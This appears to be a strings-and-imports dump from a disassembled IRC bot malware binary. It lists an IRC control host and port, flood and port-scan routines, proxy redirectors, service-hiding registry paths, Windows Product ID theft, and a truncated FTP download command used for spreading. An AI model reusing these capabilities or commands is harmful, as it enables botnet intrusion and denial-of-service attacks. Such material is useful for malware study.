sub_outside(): KERNEL32.CreateToolhelp32Snapshot KERNEL32.Process32First MSVCRT.strncmp KERNEL32.Process32Next MSVCRT.strstr MSVCRT.strncpy MSVCRT.wcscat MSVCRT.ftell MSVCRT.fseek WS2_32.send WS2_32.recv WS2_32.ntohs WS2_32.recvfrom WS2_32.inet_ntoa MSVCRT.atoi MSVCRT.rand MSVCRT.free MSVCRT.sprintf KERNEL32.InterlockedCompareExchange MSVCRT._errno MSVCRT._iob |
sub_42D230(01e7): "%s\n" "%s\r\n" |
sub_422AE0(02c4): MSVCRT.atoi WS2_32.send MSVCRT.strrchr "scan: cip (%s)" "scan: not started" " " "ftp: port: %d, total sends: %d" "scan: stopped (%d threads)" "scan: couldn't stop" " " "scan: too many threads (%s)" " " "scan: stats:" " %s: %d," " total: %d" " " " " " " " " " " "scan: invalid port" " " " " " " "scan: no ip specified" "random" "sequential" "Scan(%s): %s Port Scan %s:%d - Delay %d"... |
sub_4203A0(0303): "ServicesActive" |
sub_41A770(031f): WS2_32.select |
sub_4066E0(0352): "up: %dd %dh %dm" |
sub_431070(03f4): KERNEL32.InterlockedCompareExchange |
sub_41B9F0(075e): MSVCRT.rand |
sub_42CBA0(0bfa): MSVCRT.fprintf MSVCRT.strncmp "Control socket read failed" "%s" "%s" |
sub_42B5D0(0d8c): WS2_32.ioctlsocket WS2_32.recv WS2_32.send WS2_32.closesocket |
sub_4315F0(156f): MSVCRT.free |
sub_413BE0(17e9): ":" ":" ":" |
sub_419360(1f78): MSVCRT._stricmp WS2_32.ntohs " " "established" "listening" "%s:%d" "%s:%d" "%s: %d" "%s: %s" |
sub_40B780(1ff1): "true" |
sub_420190(26b3): "SYSTEM\\CurrentControlSet\\Services\\%s" "ImagePath" "\\" |
sub_40D600(2725): MSVCRT.strncat "kernel32.dll" "RegisterServiceProcess" "CreateToolhelp32Snapshot" "Process32First" "%s%c%s" " -bai " |
sub_4282E0(28e3): WS2_32.closesocket |
sub_412050(3261): " " " " "%s %s :%s\r\n" "%s" " " "%s" " " " " "%s %s %s\r\n" " " "%s %s\r\n" "%s\r\n" " " " " " " " " " " "%s %s %s %s\r\n" |
sub_420880(36df): "AudioSrv" "Browser" "CryptSvc" "Dhcp" "dmserver" "Dnscache" "ERSvc" "Eventlog" "EventSystem" "FastUserSwitchingCompatibility" "helpsvc" "lanmanserver" "lanmanworkstation" "LmHosts" "Netman" "PlugPlay" "PolicyAgent" "ProtectedStorage" "RasMan" "RpcSs" "SamSs" "Schedule" "seclogon" "SENS" "ShellHWDetection" "Spooler" "SSDPSRV" "stisvc" "TapiSrv" "TermService" "TrkWks" "upnphost" "W32Time" "winmgmt" "WZCSVC" "wuauserv" "Themes" "SYSTEM\\CurrentControlSet\\Services\\%s" "[%s] [????.exe] (Unknown key)" "ImagePath" "[%s] [????.exe]" "[%s] [%s]" |
sub_413850(387f): "%2.2X" |
sub_4448D0(3b76): MSVCRT._adjust_fdiv |
sub_40F0A0(3edb): "ServicesActive" |
sub_40F120(42e1): "ServicesActive" |
sub_4268B0(4314): IPHLPAPI.IcmpCreateFile IPHLPAPI.IcmpSendEcho IPHLPAPI.IcmpCloseHandle "ICMP.DLL" "IcmpCreateFile" "IcmpCloseHandle" "IcmpSendEcho" |
sub_42DEB0(43bb): "net_write(1) returned %d, errno = %d\n" "net_write(2) returned %d, errno = %d\n" |
sub_423700(4699): "%d.%d.%d.%d" |
sub_423800(4bd5): MSVCRT.rand "%d.%d.%d.%d" |
sub_4250A0(4c37): WS2_32.ntohs "cmd /c echo open %s %d >> ii &echo user"... |
sub_42BEF0(4e38): MSVCRT.atoi " " " " " " " " " " "true" " " " " " " "root" " " "[Socks5] Starting Redirect [Port %d :: "... " " |
sub_414DB0(4f91): " " " " |
sub_42A1E0(52b7): "[%s] Starting Socks4 Proxy on port %d." "[%s] Unloaded proxy on %d." |
sub_41D8D0(579c): ":" ":" ":" "ftp(badlogin)" "ftp(getting)" "ftp(baddl)" "http(badconnect)" "GET %s HTTP/1.0\r\nConnection: Keep-Alive"... "http(getting)" "wb" "http(badopen)" "\r\n\r\n" "dl, done. %s ." "open %s." "dl'ed-update: %s" "exec.error" |
sub_40C480(57af): " " "[DCC]: Failed to create socket." "dcc: failed to bind socket" "dcc: failed to open socket" "dcc: file doesn't exist" "[DCC]: File doesn't exist." "dcc: timeout" "dcc: unable to open socket" "dcc: complete to %s, file: %s, (%d byte"... "dcc: socket error" |
sub_431310(57b7): "KERNEL32.DLL" "InterlockedCompareExchange" |
sub_42A680(58ed): WS2_32.socket WS2_32.sendto WS2_32.closesocket |
sub_42F8D0(5e82): MSVCRT._errno |
sub_40CFE0(606d): MSVCRT._snprintf "%s\\*" "Found: %s\\%s" |
sub_407790(639f): "irc.alfree5.info" "3366" "KB15763.exe" "sdfsadasda" |
sub_429E50(6935): WS2_32.recv WS2_32.ioctlsocket WS2_32.closesocket |
sub_426730(69b7): "%s: %s (%utimes/%ubytes/%dms)" "[%s] Finished flooding %s %d Times" "[%s] Cannot send pings - Doesn't have D"... |
sub_40CC30(6d2d): " " " " "\\" "Files Found: %d" |
sub_40F000(7185): "ServicesActive" |
sub_425740(7228): WS2_32.closesocket |
sub_429D90(75a9): "Socks4" |
sub_429A50(75a9): "HTTP" |
sub_426F40(75a9): "syn" |
sub_427620(75a9): "udp" |
sub_42A120(75a9): "Socks4" |
sub_426A30(75a9): "forsyn" |
sub_4264E0(75a9): "ping" |
sub_426AF0(7928): "%s: %s:%u (%dseconds)" "%s: error creating threads" "%s: attack@%s:%d done." "%s" |
sub_42D610(7aca): "Invalid direction %d\n" "Invalid mode %c\n" "PASV" "%u,%u,%u,%u,%u,%u" |
sub_40A200(7c6d): MSVCRT.strstr |
sub_42A8A0(7ff0): WS2_32.select WS2_32.socket WS2_32.send |
sub_429CC0(80fe): "[%s] Starting proxy on %d with SSL." "[%s] Starting proxy on port %d." "[%s] Unloaded proxy on port %d." |
sub_419B80(82cd): MSVCRT.strncpy "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s" |
sub_431990(85ed): MSVCRT.free |
sub_40B700(8930): "true" |
sub_42EAD0(89f2): MSVCRT.free "QUIT" |
sub_426D70(8d59): WS2_32.socket |
sub_422890(902a): "asn" |
sub_412720(9060): "%d.%d.%d.%d" "lan: " ". " ". " "[PRIVATE]" "[PUBLIC]" |
sub_433AB0(9072): "" |
sub_4034E0(917c): "|" "a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t"... |
sub_428350(9403): MSVCRT.strncat MSVCRT.strstr WS2_32.recv WS2_32.closesocket " " " " "http" " " "CONNECT" "connect" " " ":" " " ":" " " ":" " " " " "HTTPROX" "\r\n" "\r\n" "\r\n" "Proxy-Connection:" ":" "Keep-Alive" "%s %s %s\r\nConnection: Keep-Alive\r\n%s" "%s %s %s\r\nConnection: close\r\n%s" "\r\n" "\r\n" " " " " " " "Transfer-Encoding:" " " "chunked" " " "Connection:" " " "Keep-Alive" "\r\n" "\r\n" "\r\n" "Connection: Keep-Alive\r\n" "Connection: Keep-Alive\r\n" "Connection: Close\r\n" "Connection: Close\r\n" "\r\n" "HTTP/1.0 200 Connection established\r\n\r\n"... "HTTP/1.0 503 Service Unavailable\r\nServe"... "HTTP/1.0 503 Service Unavailable\r\nServe"... |
sub_41F900(95c9): MSVCRT.rand WS2_32.closesocket |
sub_41A350(9aa0): WS2_32.WSAGetLastError WS2_32.select |
sub_40A140(9cfe): MSVCRT.strchr |
sub_42E060(a081): MSVCRT.free |
sub_4205D0(a712): "PSAPI.DLL" "PSAPI.DLL" "EnumProcessModules" "GetModuleFileNameExA" "unknown" |
sub_4280D0(b1b6): "[%s] Started redirect from \"%s\" to \"%s\""... "[%s] Finished redirect from \"%s\" to \"%s"... |
sub_40DBC0(c311): "%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n" "%%comspec%% /c %s %s" |
sub_40FFD0(c3ec): MSVCRT.strstr "%d.%d.%d.%d" "%s %s\r\n" "%s %s\r\n%s %s 0 0 :%s\r\n" " " " " " " " " "%s %s\r\n" " " " " " " "%s %s\r\n" "%s %s %s\r\n" " " "%s %s %s\r\n" "%s %s\r\n" " " " " "@" ":" "|" "|" " -s" " -n" " -o" " " " " "|" "|" " " " -o" " -s" " -n" ":" " " "!" "!" "@" "@" " " " " " :" " " " " " " " " " " ":" "!" "%s %s %s\r\n" " " ":" "!" " :" " :" " " " " ":" "!" ":" "!" ":" "!" |
sub_42B910(c836): "[%s] Redirecting from Port %d to '%s:%d"... "[%s] Finished redirecting from port %d "... |
sub_42CCE0(c866): "\r\n" "read" |
sub_42B430(c8ab): WS2_32.recv WS2_32.send |
sub_419FF0(ca0b): MSVCRT.strstr |
sub_42D350(cb20): MSVCRT.sprintf "Missing path argument for file transfer"... "Invalid open type %d\n" |
sub_41EFD0(cc98): WS2_32.send MSVCRT.atoi "220 \r\n" "220 \r\n" "331 \r\n" "331 \r\n" "230 \r\n" "230 \r\n" "200 \r\n" "200 \r\n" " " "," "," "," "," "," "," "%d.%d.%d.%d" "200 \r\n" "200 \r\n" "150 \r\n" "150 \r\n" "rb" "ftp: %d.%d.%d.%d -> (%d bytes) (total s"... "226 \r\n" "226 \r\n" "221 \r\n" "221 \r\n" |
sub_4248C0(cd36): "BBBB" "CCCC" |
sub_42D160(cf06): MSVCRT.sprintf "USER %s" "PASS %s" |
sub_41C6B0(d173): " " ":" " " " " ":" " " " " ":" " " " " " " " " " " " " " " " " " " |
sub_427B60(d410): WS2_32.recv |
sub_4129E0(d41e): "%s %s :%s\r\n" |
sub_41E700(d513): "%d. - Pid: %d - \"%s\"" " " " " " " " " " " " " " " " " |
sub_404C70(d536): " " " " "exec.error" " " " " "open" " " " " " " "%s resolved %s" " " " " "%s -> %s" " " "resolve.error %s." "%s %s\r\n" "%s" " " "Executed: %s." "exec.error" " " "%s" "%s %s\r\n" " " "N" "Software\\Microsoft\\OLE" |
sub_41BD30(d56c): MSVCRT.strtok |
sub_406C30(e160): MSVCRT.strtok " " " " "-update" "-netsvcs" "-bai" "-bai" " " " " |
sub_420EB0(e23f): ":" "http" "ftp" "/" "/" "@" ":" "/" "@" ":" "http" "ftp" "/" "@" ":" "/" "@" ":" ":" "/" ":" "http" "ftp" "/" "/" "/" "/" |
sub_427850(e377): MSVCRT.rand WS2_32.sendto |
sub_424EA0(e942): WS2_32.send |
sub_4276E0(e9eb): "%s: %s:%u (%ut/%ub/%dms)" "%s: %s:%d done" |
sub_435780(eacf): " " " " " " " " " " " " " " " " "HKCR: %s" " " " " "HKU: %s" "Software\\Microsoft\\Windows\\CurrentVersi"... "ProductId" "Found Windows Product ID (%s)." |
sub_404640(eaf3): " -o" " " " " " " " " |
sub_42E490(eb26): MSVCRT.fread MSVCRT.fwrite "short write: passed %d, wrote %d\n" "localfile write" |
sub_42C8A0(edf1): "tcp" "ftp" "tcp" |
sub_427000(f15c): "%s: %s:%u (%usec/%dms)" |
sub_406890(f450): "95" "NT" "98" "ME" "2000" "XP" "2003" "???" "%s [%s]" "CPU: %dMHz. Memory: %dMB/%dMB. OS: Win "... |
sub_420030(f698): "unknown" |
sub_40EDE0(f6b8): "ServicesActive" |
sub_40ECA0(f82c): "-netsvcs" |
sub_42AF50(fa28): WS2_32.accept |